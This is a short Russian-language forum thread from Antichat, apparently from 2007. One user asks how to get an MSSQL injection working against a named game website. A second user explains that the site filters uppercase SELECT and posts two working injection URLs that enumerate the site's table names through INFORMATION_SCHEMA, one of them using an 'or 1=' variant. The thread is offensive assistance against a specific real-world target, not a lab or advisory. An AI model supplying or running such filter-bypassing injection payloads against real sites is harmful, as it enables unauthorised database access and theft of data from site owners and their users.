HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Не выходит выполнить mssql запрос
  #1  
Старый 09.09.2007, 00:51
mental2
Познающий
Регистрация: 13.08.2007
Сообщений: 37
С нами: 9866407

Репутация: 1
По умолчанию Не выходит выполнить mssql запрос

Например вот так ht__tp://la2.spark-games.ru/la2info/?part=items&id=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.T ABLES)

При вставке TOP, всегда пишет message: Incorrect syntax near the keyword 'TOP'. (severity 15) in .....

Как можна узнать таблицы в такой трабле? Или же есть ли другой способ?
 

  #2  
Старый 09.09.2007, 01:15
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию

Цитата:
Сообщение от mental2  
Например вот так ht__tp://la2.spark-games.ru/la2info/?part=items&id=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.T ABLES)

При вставке TOP, всегда пишет message: Incorrect syntax near the keyword 'TOP'. (severity 15) in .....

Как можна узнать таблицы в такой трабле? Или же есть ли другой способ?
Вообще читай статью [cash]
https://forum.antichat.ru/thread30501.html

Но в принципе у тебя здесь проблема в фильтрации SELECT, причем(что странно) только с буквами в верхнем регистре, поэтому в данном случае работает вот так:

Код:
http://la2.spark-games.ru/la2info/?part=items&id=(select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
или так

Код:
http://la2.spark-games.ru/la2info/?part=items&id=-1+or+1=(select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
что не принципиально в данном случае.
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.